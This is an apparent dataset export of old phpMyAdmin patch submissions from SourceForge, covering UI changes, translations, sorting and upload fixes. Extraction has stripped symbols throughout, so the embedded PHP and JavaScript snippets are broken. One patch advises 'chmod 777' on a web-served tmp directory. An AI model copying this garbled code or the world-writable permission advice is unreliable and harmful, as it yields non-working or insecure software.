"24444","3966","Drop Table Link on Table Pages.
Have added a link to the table description pages to drop the current table.
Original URL https sourceforge.net p phpmyadmin patches 22 https sourceforge.net p phpmyadmin patches 22 Original author logan69","bug"
"24444","3967","Display order in tbl select.php3.
Hi all !
Modified tbl select.php3 to allow display order in built query.
Some strings ready to be outsourced in lang files and translated.
Comments in source are in French.
See you Laurent Original URL https sourceforge.net p phpmyadmin patches 23 https sourceforge.net p phpmyadmin patches 23 Original author efcis","bug"
"24444","3968","Small improvement of columns header.
Hi !
Please find below small patch to improve display of sorting order in columns header initially submitted by Thomas Michael Winningham antipasto)).
Modify following lines in display table function in lib.inc.php3 if mysql num rows dt result) amp;gt;1 amp;amp; amp;amp; !
is simple) \{ Some code... \} by if mysql num rows dt result) amp;gt;1 amp;amp; amp;amp; !
is simple) \{ echo amp;quot; amp;lt;th amp;gt; amp;quot;; if empty sql order))|| !eregi amp;quot; amp;quot;.
field amp;gt;name.
amp;quot;[ , ] amp;quot;, sql order))) \{ sort order=urlencode amp;quot; order by field amp;gt;name cfgOrder amp;quot;); ordered by= ; \} else if substr sql order, 3) == ASC ) and eregi amp;quot; amp;quot;.
field amp;gt;name.
amp;quot;[ , ] amp;quot;, sql order)) \{ sort order=urlencode amp;quot; order by field amp;gt;name DESC amp;quot;); ordered by= ; \} else if substr sql order, 4) == DESC ) and eregi amp;quot; amp;quot;.
field amp;gt;name.
amp;quot;[ , ] amp;quot;, sql order)) \{ sort order=urlencode amp;quot; order by field amp;gt;name ASC amp;quot;); ordered by= ; \} echo amp;quot; amp;lt;A HREF=\ amp;quot;sql.php3?server= server amp;amp;lang= lang amp;amp;db= db amp;amp;pos= pos amp;amp;sql query= amp;quot;.urlencode sql query).
amp;quot; amp;amp; sql order= sort order amp;amp;table= table\ amp;quot; amp;gt; amp;quot;; echo field amp;gt;name; echo amp;quot; amp;amp;nbsp; amp;amp;nbsp; amp;quot;; if ordered by== ) \{ echo amp;quot;v amp;quot;; \} elseif ordered by== ) \{ echo amp;quot; amp;quot;; \} echo amp;quot; amp;lt; a amp;gt; amp;quot;; echo amp;quot; amp;lt; th amp;gt;\n amp;quot;; \} Of course, v and symbol are basic and small arrows icons could be used instead... See you Laurent Original URL https sourceforge.net p phpmyadmin patches 24 https sourceforge.net p phpmyadmin patches 24 Original author efcis","bug"
"24444","3969","display amp; dump index length.
the following patch for rc3 php does \ display index length on tbl properties but not on tbl printview \ export index length in dump \ preface of patch for dump to other database systems that is not complete and only done for some postgres datatypes and no checking yet but the result is more sql like Original URL https sourceforge.net p phpmyadmin patches 25 https sourceforge.net p phpmyadmin patches 25 Original author helly","bug"
"24444","3970","extchg.sh.
The following problem occured with the current version of extchg.sh .
extchg.sh php php3 doesnot only change the filename extensions but also the trailing amp;lt;?php in each file.
Changing sed e s 1 2 g to sed e s \.
1 \.
2 g solves the problem.
Original URL https sourceforge.net p phpmyadmin patches 27 https sourceforge.net p phpmyadmin patches 27 Original author anonymous","bug"
"24444","3971","Spanish traductions.
Fixes traductions Original URL https sourceforge.net p phpmyadmin patches 26 https sourceforge.net p phpmyadmin patches 26 Original author fcuello","bug"
"24444","3972","Login Script Code.
I didnt want to submit anything but auth.php the following changes need to be made to the follownig file line 16 of header.php must read include amp;quot;auth.inc amp;quot;); this is to get it to check just before the other headers so it can redirect on an incorrect passwords) Some of the code inside the code.zip file may need to be changed to get certain ip adresses enjoy!
Kind Regards nervlord nolimits) Original URL https sourceforge.net p phpmyadmin patches 28 https sourceforge.net p phpmyadmin patches 28 Original author nolimits","bug"
"24444","3973","show current db table info in the title.
a very usefull patch that shows database table name in browser s title Original URL https sourceforge.net p phpmyadmin patches 29 https sourceforge.net p phpmyadmin patches 29 Original author kaa348","bug"
"24444","3974","Patch to fix bug 446830. http sourceforge.net tracker index.php?func=detail amp;amp;aid=446830 amp;amp;group id=23067 amp;amp;atid=377408 Original URL https sourceforge.net p phpmyadmin patches 30 https sourceforge.net p phpmyadmin patches 30 Original author ivazquezabrams","bug"
"24444","3975","Patch for bug 448010.
I also changed split ) to spliti ) to handle stuff like From .
Original URL https sourceforge.net p phpmyadmin patches 31 https sourceforge.net p phpmyadmin patches 31 Original author ivazquezabrams","bug"
"24444","3976","Got it !.
It s ok ) Just added this edit url .= amp;quot; amp;amp;sql query= amp;quot;.urlencode sql query).
amp;quot; amp;quot;.urlencode sql order); Original URL https sourceforge.net p phpmyadmin patches 32 https sourceforge.net p phpmyadmin patches 32 Original author blenderman","bug"
"24444","3977","bug 448224 for 2.2.0RC3.
line 478 The SQL query must containt the ORDER BY sql order) This is the change Added by Dell Aiera Pol blenderman wanadoo.be) 7 07 2001 edit url .= amp;quot; amp;amp;sql query= amp;quot;.urlencode sql query).
amp;quot; amp;quot;.urlencode sql order); pol Original URL https sourceforge.net p phpmyadmin patches 33 https sourceforge.net p phpmyadmin patches 33 Original author blenderman","bug"
"24444","3978","fix for mysql error on no default server.
There is a problem in defines.inc.php where we try to connect to a database to get the version.
The connection is only a problem when we have not selected a default DB to connect to cfgServerDefault = 0).
There is no check to see if there is a default database selected before mysql query is called.
It looks as though someone commented out the line that suppresses the error output if there s no database the mysql query) and replaced it with an almost identical line which simply doesn t have the .
I also removed the first mysql query inside of the first if block because it s redundant.
If the first query succeeds, then it doesn t need to be run again.
This patch is for 2.2.0 release candidate 4.
Original URL https sourceforge.net p phpmyadmin patches 34 https sourceforge.net p phpmyadmin patches 34 Original author drama","bug"
"24444","3979","Content length.
Date Mon, 13 Aug 2001 17 30 52 0100 From Cal Henderson amp;lt;Cal.Henderson emap.com amp;gt; i assume this kind of patch is common place or possibly i m an idiot and just haven t notcied the opion in the program itself).
this patch allows you to limit the maximum amount of data shown for each field in browse mode.
without this, you can get a full 4gb potentially) displayed for LONGTEXT fields, which slows down browsing quite a bit.
open config.inc.php find cfgAttributeTypes = array amp;quot; amp;quot;, amp;quot;BINARY amp;quot;, amp;quot;UNSIGNED amp;quot;, amp;quot;UNSIGNED ZEROFILL amp;quot;); add cfgLimitChars = 50; you may want to change 50 to 100 or 200) open lib.inc.php find function display table dt result, is simple = false) \{ global cfgBorder, cfgBgcolorOne, cfgBgcolorTwo, cfgMaxRows, pos; global server, lang, db, table, sql query, sql order, cfgOrder, cfgShowBlob; global goto, strShowingRecords, strSelectNumRows, SelectNumRows; global strTotal, strEdit, strPrevious, strNext, strDelete, strDeleted; global strPos1, strEnd, sessionMaxRows, strGo, strShow, strRowsFrom; global cfgModifyDeleteAtLeft, cfgModifyDeleteAtRight; global strKill; add global cfgLimitChars; find \} elseif cfgShowBlob == false amp;amp; amp;amp; eregi amp;quot;BLOB amp;quot;, primary amp;gt;type)) \{ echo amp;quot; amp;lt;td align=right amp;gt; amp;amp;nbsp;[BLOB] amp;amp;nbsp; amp;lt; td amp;gt;\n amp;quot;; \} else \{ add if strlen row[ i]) amp;gt; cfgLimitChars)\{ row[ i] = substr row[ i],0, cfgLimitChars) .
amp;quot;... amp;quot;; \} done ) Original URL https sourceforge.net p phpmyadmin patches 35 https sourceforge.net p phpmyadmin patches 35 Original author lem9","bug"
"24444","3980","number of tables in database.
Date Tue, 14 Aug 2001 10 08 38 0200 From amp;quot;Laurent KRUK amp;quot; amp;lt;laurent.kruk free.fr amp;gt; It would be nice to show the number of tables in the selected database.
For example, by modifying the code in db details.php3 like that line 80) ... ... amp;lt;!
TABLE LIST amp;gt; amp;lt;table border= amp;quot; amp;lt;?php echo cfgBorder; ?
amp;gt; amp;quot; amp;gt; amp;lt;tr amp;gt; amp;lt;th colspan= amp;quot;9 amp;quot; amp;gt; amp;lt;?php echo num tables.
amp;quot; tables in database amp;quot;.
db;?
amp;gt; amp;lt; th amp;gt; amp;lt; tr amp;gt; amp;lt;tr amp;gt; amp;lt;th amp;gt; amp;lt;?php echo ucfirst strTable); ?
amp;gt; amp;lt; th amp;gt; amp;lt;th colspan= amp;quot;6 amp;quot; amp;gt; amp;lt;?php echo ucfirst strAction); ?
amp;gt; amp;lt; th amp;gt; ... ...
The best would probably to add a new string in the lang files, something like strTablesInDatabase to replace the amp;quot; tables in database amp;quot;.
Laurent Original URL https sourceforge.net p phpmyadmin patches 36 https sourceforge.net p phpmyadmin patches 36 Original author lem9","bug"
"24444","3981","cfgServer[ only db ] array.
cfgServer[ only db ] now can be an array.
So now it s possible to show not only one or all), but also 2, 3, 4 amp;amp; so on) databases.
Original URL https sourceforge.net p phpmyadmin patches 37 https sourceforge.net p phpmyadmin patches 37 Original author ubanus","bug"
"24444","3982","Polish translation.
Wed, 22 Aug 2001 15 43 56 0200 Original URL https sourceforge.net p phpmyadmin patches 38 https sourceforge.net p phpmyadmin patches 38 Original author d3xter","bug"
"24444","3983","updated Swedish translation.
Updated Swedish translation.
Several spelling errors fixed and many new strings translated.
Original URL https sourceforge.net p phpmyadmin patches 39 https sourceforge.net p phpmyadmin patches 39 Original author kap42","bug"
"24444","3984","quot;Smart quot; order.
cfgOrder now can be amp;quot;SMART amp;quot;, so fields of type TIME, DATE, DATETIME amp;amp; TIMESTAMP are sorted descending the latest records at the top) and the other ones ascending, when you click on their names.
I use phpMyAdmin really often and I know this is it the best solution for sorting. )
Original URL https sourceforge.net p phpmyadmin patches 40 https sourceforge.net p phpmyadmin patches 40 Original author ubanus","bug"
"24444","3985","Check forbidden words.
This is a patch from blenderman to check for reserved words in field names.
Original URL https sourceforge.net p phpmyadmin patches 41 https sourceforge.net p phpmyadmin patches 41 Original author lem9","bug"
"24444","3986","Romanian Language.
I translated the language in Romanian.
I hope this help.
Original URL https sourceforge.net p phpmyadmin patches 42 https sourceforge.net p phpmyadmin patches 42 Original author lvalics","bug"
"24444","3987","Detail record count on left menu.
Added the number of records each table has in the left hand column.
Original URL https sourceforge.net p phpmyadmin patches 43 https sourceforge.net p phpmyadmin patches 43 Original author logan69","bug"
"24444","3988","Show full text type field.
amp;quot;Opi amp;quot; amp;lt;opi at volny.cz amp;gt; suggested me this patch and I ve updated it a bit.
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin patches 44 https sourceforge.net p phpmyadmin patches 44 Original author loic1","bug"
"24444","3989","Localised dates in dump and db stats.
This simple patch allows to print localised dates in dump and db stats.
To localise date something like setlocale LC ALL, Czech ); should be added to every translation file.
Updated Czech translation in includes this.
Original URL https sourceforge.net p phpmyadmin patches 45 https sourceforge.net p phpmyadmin patches 45 Original author nijel","bug"
"24444","3990","Advanced index generation editing.
This patch allows you to create index from multiple fields.
It is based on simmilar code which was used for multiple amp;quot;DROP DELETE ALTER amp;quot; statements.
According to changes, file mult drops.inc.php3 should be renamed, because it now contains code to do indexes maybe mult command.inc.php3 could be good choice).
Original URL https sourceforge.net p phpmyadmin patches 46 https sourceforge.net p phpmyadmin patches 46 Original author nijel","bug"
"24444","3991","Nicer navigation for MSIE, update....
I added change of background to left layer..see Original URL https sourceforge.net p phpmyadmin patches 47 https sourceforge.net p phpmyadmin patches 47 Original author helly","bug"
"24444","3992","UI small html change in frame options.
The following entry allows users to adjust the horizontal default width between the two frames making a big difference in usability, IMHO.
I tested the changes with IE6.0 and NS6.1 on Win2K Server machines.
They need further testing, but should work at least as well as the original settings.
For most users, they will be able to customize and not have to futz with the tree view not fitting right on the left hand side.
I appologize if this is not the right patch file format, I need some assistance in generating proper format files as I am using wincvs and this is what the diff command gave me, all the details are there, but need to be applied exactly.
about 45 min worth of testing went into it) Enjoy, I did not lint the html but was pretty careful about it.
Original URL https sourceforge.net p phpmyadmin patches 48 https sourceforge.net p phpmyadmin patches 48 Original author killerapp","bug"
"24444","3993","Home page for unpriviliged user.
Unpriviliged user without access to mysql database) can t use main.php page.
This patch fixes it.
Original URL https sourceforge.net p phpmyadmin patches 49 https sourceforge.net p phpmyadmin patches 49 Original author d3xter","bug"
"24444","3994","Cookie based authentication.
This is an old idea cookie based authentication.
I replace original code with this method of authentication in Debian package.
I think the user could choose the authentication method in config file, i.e.
by cfgServers[][ cookie auth ] variable.
I d like to prepare a path for CVS version of phpMyAdmin if this patch would be applied to official code.
Original URL https sourceforge.net p phpmyadmin patches 50 https sourceforge.net p phpmyadmin patches 50 Original author d3xter","bug"
"24444","3995","Change of display for TEXT records.
Here is a small patch that I think would be nice to see in mysqladmin.
It displays the actual formatting of the TEXT rather than simply replacing the BR piece.
lib.inc.php3 1213,1214c1213 amp;lt; row[ i] = ereg replace amp;quot; \015\012)| \015)| \012)) amp;quot;, amp;lt;br amp;gt; , htmlspecialchars row[ i])); amp;lt; echo amp;lt;td amp;gt; .
row[ i] .
amp;lt; td amp;gt; .
amp;quot;\n amp;quot;; amp;gt; echo amp;lt;td amp;gt; amp;lt;xmp amp;gt; .
row[ i] .
amp;lt; xmp amp;gt; amp;lt; td amp;gt; .
amp;quot;\n amp;quot;; I have tested this in both Netscape and IE.
Original URL https sourceforge.net p phpmyadmin patches 51 https sourceforge.net p phpmyadmin patches 51 Original author oaxlin","bug"
"24444","3996","Please change that arrow ).
I know it was meant to temporarily, anyway if u got use for it here it goes.
grey feels good.
width height adjusted to center both column and row) I m a big fan of phpMyAdmin, keep up the VERY good work!
p.s.
Don t know if this is the right place for this.
If not, sorry ) Miguel A. Sepxc3xbalveda WebDesigner PORTUGAL Original URL https sourceforge.net p phpmyadmin patches 55 https sourceforge.net p phpmyadmin patches 55 Original author anonymous","bug"
"24444","3997","More verbose title.
It would be nice if HTML title contained more information.
Original URL https sourceforge.net p phpmyadmin patches 52 https sourceforge.net p phpmyadmin patches 52 Original author d3xter","bug"
"24444","3998","Inserting rows in loop.
Hello, this simple patch add feature for inserting new rows in loop.
After Save button is pressed, the same inserting page is shown again.
One language string was added.
There is a small bug when inserting page is refreshed, page title appears twice.
All changes are marked by .
Have a nice day.
Tomas Original URL https sourceforge.net p phpmyadmin patches 53 https sourceforge.net p phpmyadmin patches 53 Original author anonymous","bug"
"24444","3999","black arrow.gif for 472176.
I am not Miguel!
Original URL https sourceforge.net p phpmyadmin patches 57 https sourceforge.net p phpmyadmin patches 57 Original author anonymous","bug"
"24444","4000","Inserting rows in loop second attempt).
I m trying secondary to attach patch file.
Original URL https sourceforge.net p phpmyadmin patches 54 https sourceforge.net p phpmyadmin patches 54 Original author loskutak","bug"
"24444","4001","new arrow.gif for 2.2.1 RC2.
The current arrow.gif looks like butt, here s one that doesn t look like it was done with crayola.
See attachment!
Original URL https sourceforge.net p phpmyadmin patches 56 https sourceforge.net p phpmyadmin patches 56 Original author anonymous","bug"
"24444","4002","indicator in table rows.
Hi!
Darklord amp;lt;darklord at chello.at amp;gt; suggested the improvment below in the phpWizard forum http www.phpwizard.net phorum read.php?
f=1 amp;amp;i=5984 amp;amp;t=5984) amp;quot;When i work with great database it much easier to found something when i use a row indicator.
amp;quot; His patch modified for the 2.2.1 rc2 is to change the line 607 of amp;quot;libraries diplay tbl.lib.php3 amp;quot; from amp;lt;tr bgcolor= amp;quot; amp;lt;?php echo bgcolor; ?
amp;gt; amp;quot; amp;gt; to amp;lt;tr bgcolor= amp;quot; amp;lt;?php echo bgcolor; ?
amp;gt; amp;quot; onmouseover= amp;quot;if typeof this.style) != undefined ) this.style.backgroundColor = CC6666 amp;quot; onmouseout= amp;quot;if typeof this.style) != undefined ) this.style.backgroundColor = amp;quot; amp;gt; Of course the indicator color should be defined in the config file.
Loxc4x8fc Original URL https sourceforge.net p phpmyadmin patches 58 https sourceforge.net p phpmyadmin patches 58 Original author loic1","bug"
"24444","4003","hiding full text of navigation buttons.
Option to display navigation bar as [ amp;lt; amp;lt; ] [ amp;lt; ] ..., instead of [ amp;lt; amp;lt; begin ] [ amp;lt; previous ].
Original URL https sourceforge.net p phpmyadmin patches 59 https sourceforge.net p phpmyadmin patches 59 Original author gt2","bug"
"24444","4004","Add number of records in database stats.
This adds number of records per database, and total in the database statistics page somthing I needed and that could be useful to others).
Original URL https sourceforge.net p phpmyadmin patches 60 https sourceforge.net p phpmyadmin patches 60 Original author anonymous","bug"
"24444","4005","Cosmetic Change.
Virtical Align on data fields to the top for ease of reading.
Original URL https sourceforge.net p phpmyadmin patches 61 https sourceforge.net p phpmyadmin patches 61 Original author logan69","bug"
"24444","4006","display name of server after db table.
the diff below will make the header include what server you are currently working on which is great when you are admin on many servers and using the phpMyAdmin interface for them all.
servername) after the database table name like this Database mysql on localhost) Database mysql table user on localhost) DIFF phpMyAdmin 2.2.1 header.inc.php Wed Oct 24 20 10 01 2001 phpmyadmin header.inc.php Tue Nov 6 11 08 07 2001 124,129 124,132 if !empty table)) \{ echo .
strTable .
.
htmlspecialchars table); \} \ if server) \{ \ echo amp;quot; on amp;quot;.
cfgServers[ server] [ verbose ])?
cfgServers[ server] [ verbose ] cfgServers[ server][ host ]).
amp;quot;) amp;quot;; \ \} echo amp;lt; h1 amp;gt; .
amp;quot;\n amp;quot;; \} echo amp;quot;\n amp;quot;; Original URL https sourceforge.net p phpmyadmin patches 62 https sourceforge.net p phpmyadmin patches 62 Original author embeejay","bug"
"24444","4007","Add number of records in database stats.
see above, sourceforge f cked up the first time i submited it ...
Original URL https sourceforge.net p phpmyadmin patches 63 https sourceforge.net p phpmyadmin patches 63 Original author six dfx","bug"
"24444","4008","Support of safe mode for reading dump.
When using safe mode or open basedir phpMyAdmin can t read the temporary files stored in tmp, so a db dump is not possible.
My patch is just a replacement for script read dump.php to make it move the temporary file to a directory that is readable by Apache Php.
To install it just replace read dump.php and create a directory named amp;quot;tmp amp;quot; without the quotes) inside the phpMyAdmin directory.
Of course, the tmp directory must be owned by Apache s user.
Tech notes I just added two lines of code to the script, and modified one line.
Alessandro Ranellucci jr Hosting Center .it alex primafila.net Original URL https sourceforge.net p phpmyadmin patches 64 https sourceforge.net p phpmyadmin patches 64 Original author anonymous","bug"
"24444","4009","multi tbl printView.
Multi Printable Table.
2 file modified db detail to call, tbl printView to run Add in tbl printView xc2xa7 It s juste include the old procedure in a loop.
Selects the database mysql select db db); add by Moosh if is array tables)) \{ lesTables = tables; \} else \{ if isset tables)) \{ lesTables = explode amp;quot;| amp;quot;, tables); \} if isset table)) \{ lesTables[] = table; \} \} multiTable = 0; if sizeof lesTables) amp;gt; 1) \{ multiTable = 1; while list key, table ) = each lesTables)) \{ echo [ .
table. ]
; \} \} reset lesTables); while list key, table ) = each lesTables)) \{ if multiTable) echo amp;lt;div style= amp;quot;page break after always; amp;quot; amp;gt; amp;lt;H1 amp;gt; .
table.
amp;lt; H1 amp;gt; ; end of add by Moosh Gets table informations and on the end of same file amp;lt;?php \} end if MYSQL INT VERSION amp;gt;= 32303 amp;amp; amp;amp; nonisam == FALSE) \} end if cfgShowStats) ajout Moosh if multiTable) \{ nettoyer les valeurs unset ret keys); unset num rows); unset show comment); echo amp;lt; DIV amp;gt; amp;lt;HR amp;gt; ; \} \} fin ajout Moosh Displays the footer echo amp;quot;\n amp;quot;; require .
footer.inc.php ); ?
amp;gt; In db Detail amp;lt;!
DATABASE WORK amp;gt; amp;lt;ul amp;gt; amp;lt;?php if num tables amp;gt; 0) \{ ?
amp;gt; amp;lt;!
Printable view of a table amp;gt; amp;lt;li amp;gt; amp;lt;div style= amp;quot;margin bottom 10px amp;quot; amp;gt; amp;lt;a href= amp;quot;db printview.php?
amp;lt;?php echo url query; ?
amp;gt; amp;quot; amp;gt; amp;lt;?
php echo strPrintView; ?
amp;gt; amp;lt; a amp;gt; amp;lt; div amp;gt; amp;lt;?
Add by Moosh ?
amp;gt; amp;lt;FORM method= amp;quot;post amp;quot; action= amp;quot;tbl printview.php?
lang= amp;lt;?php echo lang; ?
amp;gt; amp;amp;server= amp;lt;?php echo server; ?
amp;gt; amp;amp;db= amp;lt;?php echo db; ?
amp;gt; amp;amp;goto=db details.php amp;quot; amp;gt; amp;lt;input type= amp;quot;submit amp;quot; amp;gt; amp;lt;br amp;gt; amp;lt;select name= amp;quot;tables[] amp;quot; size= amp;quot;5 amp;quot; multiple= amp;quot;multiple amp;quot; amp;gt; amp;lt;?php i = 0; echo amp;quot;\n amp;quot;; while i amp;lt; num tables) \{ table = MYSQL INT VERSION amp;gt;= 32300) ?
tables[ i][ Name ] tables[ i]); echo amp;lt;option value= amp;quot; .
table .
amp;quot; amp;gt; .
table .
amp;lt; option amp;gt; .
amp;quot;\n amp;quot;; i ; \} echo amp;quot; amp;lt; select amp;gt; amp;lt; FORM amp;gt; amp;quot;; end of Add by Moosh ?
amp;gt; amp;lt; li amp;gt; amp;lt;?php \} ?
amp;gt; amp;lt;!
Query box, sql file loader and bookmark support amp;gt; Original URL https sourceforge.net p phpmyadmin patches 65 https sourceforge.net p phpmyadmin patches 65 Original author moosh fr","bug"
"24444","4010","Show the machine on the left pane.
This patch shows the current database hostname on the top of the left pane.
Very usefull if you have several machines running similar databases.
Probably needs some more configuration at the html design, but I think it is very much to standards.
The patch consists only of the modified left.php3 file.
tar and gzip of course).
Original URL https sourceforge.net p phpmyadmin patches 67 https sourceforge.net p phpmyadmin patches 67 Original author cfmsoft","bug"
"24444","4011","php 4.0.3pl1 workaround.
Submitted by davor at hdinfo.hr, he has a blank page at right frame.
Original URL https sourceforge.net p phpmyadmin patches 68 https sourceforge.net p phpmyadmin patches 68 Original author lem9","bug"
"24444","4012","Fix for indicator in browse mode.
Hi, current indicator in browse mode doestn t work correctly in Konqueror and current version is IMHO also too big.
To listing of items to each amp;lt;tr amp;gt; please add onmouseover= amp;quot;highlight this,\ .
color.
\ ); amp;quot; onmouseout= amp;quot;unhighlight this); amp;quot; and somewhere add following JavaScript code function highlight what,color)\{ if typeof what.style) != undefined )\{ oldBackground=what.style.backgroundColor; what.style.backgroundColor = color; \} return true; \} function unhighlight what)\{ if typeof what.style) != undefined ) what.style.backgroundColor = oldBackground; return true; \} Regards Nijel Original URL https sourceforge.net p phpmyadmin patches 66 https sourceforge.net p phpmyadmin patches 66 Original author nijel","bug"
"24444","4013","Vertical horizontal table browsing.
From Garvin Hicking hicking faktor e.de) Hi!
I took the time to integrate a change I did long ago to an older version of PhpMyAdmin into the latest amp;quot;stable amp;quot; release.
Sadly, I didn t do it in the latest CVS build because this port is blocked here at my office.
First, what the patch does is to enhance the amp;quot;Show X rows starting from Y to Z amp;quot; dialog to the phrase amp;quot;in [vertical horizontal] mode and repeat headers after ZZ cells amp;quot;.
Then the output done in the display tbl.lib.php3 file is formated in horizontal or vertical columns, which was quite useful for me in some times I had to browse tables which huge amounts of keys, and I hate to scroll horizontally.
Also, that headers are repeated after X cells is quite usefull, I think.
I have done my best to make easy changes to the current structure without too much intereference.
Somethings could have been done better, because they are now somehow redundant.
But maybe one of the core developers can have a look at my changes and proceed at will.
If I can be of any help integrating the patch, please let me know.
The php file itself can be found at http www2.bonnet.de garvin display tbl.lib.txt I didn t know whether I m allowed to post attachments or not) you also have to alter the language and config files, which are appended to my E Mail.
Feedback appreciated. )
amp;gt; amp;gt; config.inc.php BEGIN Changes for new vertical horizontal Browse mode, Garvin Hicking amp;lt;hicking faktor e.de amp;gt; cfgLeftWidth = 150; left frame width cfgDefaultDisplay = amp;quot;horizontal amp;quot;; default display mode horizontal|vertical) cfgRepeatCells = 100; repeat header names every X cells?
0 = deactivate) END Changes for new vertical horizontal Browse mode, Garvin Hicking amp;lt;hicking faktor e.de amp;gt; amp;gt; amp;gt; amp;lt;language amp;gt;.inc.php BEGIN Changes for new vertical horizontal Browse mode, Garvin Hicking amp;lt;hicking faktor e.de amp;gt; strRowsInModePre = in ; strRowsModeVertical = vertical ; strRowsModeHorizontal = horizontal ; strRowsInModeAfter = mode and repeat headers after ; strRowsInModeCells = cells ; END Changes for new vertical horizontal Browse mode, Garvin Hicking amp;lt;hicking faktor e.de amp;gt; Bye, Garvin.
Original URL https sourceforge.net p phpmyadmin patches 69 https sourceforge.net p phpmyadmin patches 69 Original author lem9","bug"
"24444","4014","konqueror fix.
Maybe konqueror is only half DOM compliant, but I think it should be fully IE compatible.
With the following patch I am able to use the tree view with konqueror 2.2.1 Regards, Slaven phpMyAdmin left.php Sun Dec 2 18 29 07 2001 new.phpMyAdmin left.php Fri Dec 14 21 59 21 2001 85,11 85,12 ?
1 0; var capable = isDOM || isIE4 || isNS4) ?
1 0; Uggly fix for Konqueror 2.2 that is half DOM compliant \ Ugly fix for Konqueror 2.2 that is half DOM compliant if capable amp;amp; amp;amp; typeof navigator.userAgent) != undefined ) \{ var browserName = navigator.userAgent.toLowerCase ); if browserName.indexOf konqueror ) amp;gt; 0) \{ capable = 0; \ capable = 1; \ isIE4 = 1; \} \} var fontFamily = amp;lt;?php echo left font family; ?
amp;gt; ; Original URL https sourceforge.net p phpmyadmin patches 70 https sourceforge.net p phpmyadmin patches 70 Original author eserte","bug"
"24444","4015","Query is empty.
I couldn t change the column for sort order.
I ve got a message Query is empty .
This patch should fix it display tbl.lib.php3 2001 12 16 23 52 28 1.26 display tbl.lib.php3 2001 12 17 15 53 33 556,7 556,7 .
amp;amp;amp;table= .
urlencode table) .
amp;amp;amp;pos= .
pos .
amp;amp;amp;session max rows= .
session max rows .
amp;amp;amp;dontlimitchars .
dontlimitchars \ .
amp;amp;amp;dontlimitchars= .
dontlimitchars .
amp;amp;amp;sql query= .
urlencode sorted sql query); 2.1.5 Displays the sorting url Original URL https sourceforge.net p phpmyadmin patches 71 https sourceforge.net p phpmyadmin patches 71 Original author d3xter","bug"
"24444","4016","cookie with domain.
Cookies should had a domain parameter.
The default domain is substracted from server name, so it might be problematic if a several phpMyAdmins are used in one domain.
Original URL https sourceforge.net p phpmyadmin patches 72 https sourceforge.net p phpmyadmin patches 72 Original author d3xter","bug"
"24444","4017","Support for OS 2 browsers.
Add OS 2 to list of recognized user strings, add proper font size for Opera for OS 2, add form control fonts to CSS.
Original URL https sourceforge.net p phpmyadmin patches 73 https sourceforge.net p phpmyadmin patches 73 Original author ydario","bug"
"24444","4018","open basedir restriction for upload file.
This patch solve problem open basedir restriction in upload file.
for 2.2.2 phpMyAdmin and PHP4 version please create tmp directory in installation tree and execute command chmod 777 tmp.
read dump.php Sun Dec 2 18 29 07 2001 read dump.php.new Fri Jan 4 11 16 53 2002 218,5 218,12 if sql file != none ) \{ if file exists sql file) amp;amp; amp;amp; is uploaded file sql file)) \{ sql query = fread fopen sql file, r ), filesize sql file)); \ \ sql file new= amp;quot;.
tmp amp;quot; .
basename sql file); \ move uploaded file sql file, sql file new); \ \ sql query = fread fopen sql file new, r ), filesize sql file new)); \ \ unlink sql file new); \ if get magic quotes runtime ) == 1) \{ sql query = stripslashes sql query); Original URL https sourceforge.net p phpmyadmin patches 75 https sourceforge.net p phpmyadmin patches 75 Original author anonymous","bug"
"24444","4019","Fix quotes in tbl select.php.
Hi, In tbl select.php version 2.2.2), whne you enter exact word to search, the cmp variable = is usedbut the quotes has to instanciated to \ because of strings...
Here is the patch tbl select.php Thu Jan 3 13 23 26 2002 tbl select.php.orig Thu Jan 3 11 45 00 2002 187,7 187,7 else \{ cmp = ; \} else \{ quot = \ ; \ quot = ; cmp = = ; \} end if sql query .= AND .
PMA backquote urldecode names[ i])) .
amp;quot; cmp quot fields[ i] quot amp;quot;; Thank you.
Original URL https sourceforge.net p phpmyadmin patches 74 https sourceforge.net p phpmyadmin patches 74 Original author srodriguez","bug"
"24444","4020","JavaScript strict warnings.
This patch fixes several JavaScript strict warnings for Gecko based browsers Mozilla, Netscape 6 are examples).
I can pretty much guarantee the spacing is off a little.
Original URL https sourceforge.net p phpmyadmin patches 76 https sourceforge.net p phpmyadmin patches 76 Original author anonymous","bug"
"24444","4021","disable null fields.
When the null checkbox of a field is checked it is still possible to edit that field.
imho it would be better if a field would be disabled if its null checkbox is checked.
I tried to build in this feature myself.
The attached file was taken as amp;quot;tbl change.php amp;quot; v1.67 from amp;quot;phpMyAdmin 2.2.4 cvs 20020107 php.zip amp;quot; before I modified it and pushed up the version to 1.68, please forgive me g ).
It would be great if you could add this feature to the CVS tree since it is very useful for people like me typing 100 KB into a text field without unchecking its null checkbox ; ) Rabus Original URL https sourceforge.net p phpmyadmin patches 77 https sourceforge.net p phpmyadmin patches 77 Original author rabus","enhancement"
"24444","4022","Table relation links.
I did two changes to the display tbl.lib.php for the following functionality If you have a field in your table which is a relation to another field so the link shows the related data.
The table relations are stored in a table in the mysql database CREATE TABLE relation src table varchar 32) NOT NULL default , src column varchar 32) NOT NULL default , dest table varchar 32) NOT NULL default , dest column varchar 32) NOT NULL default , PRIMARY KEY src table,src column) ) TYPE=MyISAM COMMENT= Table Relation ; My changes 2b Get field references from Database find tables which are used get needed entries from the relation table create map[ amp;lt;source column amp;gt;] = array amp;lt;destination table amp;gt;, amp;lt;destination column amp;gt; ) Added parameter map to function and call) of PMA displayTableBody.
Added in the function PMA displayTableBody 2.
Displays the rows values if field mapping exists output field with link Another questinon Why are the fields referenced with the name and not with the index i in PMA displayTableBody where the rows are displayed?
Result if you have two culumns with the same names, you get the first value twice.
Original URL https sourceforge.net p phpmyadmin patches 78 https sourceforge.net p phpmyadmin patches 78 Original author n8falke","bug"
"24444","4023","Problem with lt;base href= quot; quot; gt;.
If cfgPmaAbsoluteUri is left empty in config.inc.php, the amp;lt;base href= amp;quot; amp;quot; amp;gt; XHTML header Loxc4x8fc added a few hours ago doesn t work correctly.
Looking for a solution for that problem, I made a patch that detects the correct value for cfgPmaAbsoluteUri automatically if it has been left empty.
I attached the file I changed common.lib.php), you can find the changes in lines 145 to 153.
I hope, I could help you, Rabus Original URL https sourceforge.net p phpmyadmin patches 79 https sourceforge.net p phpmyadmin patches 79 Original author rabus","bug"
"24444","4024","Feature Request 511816.
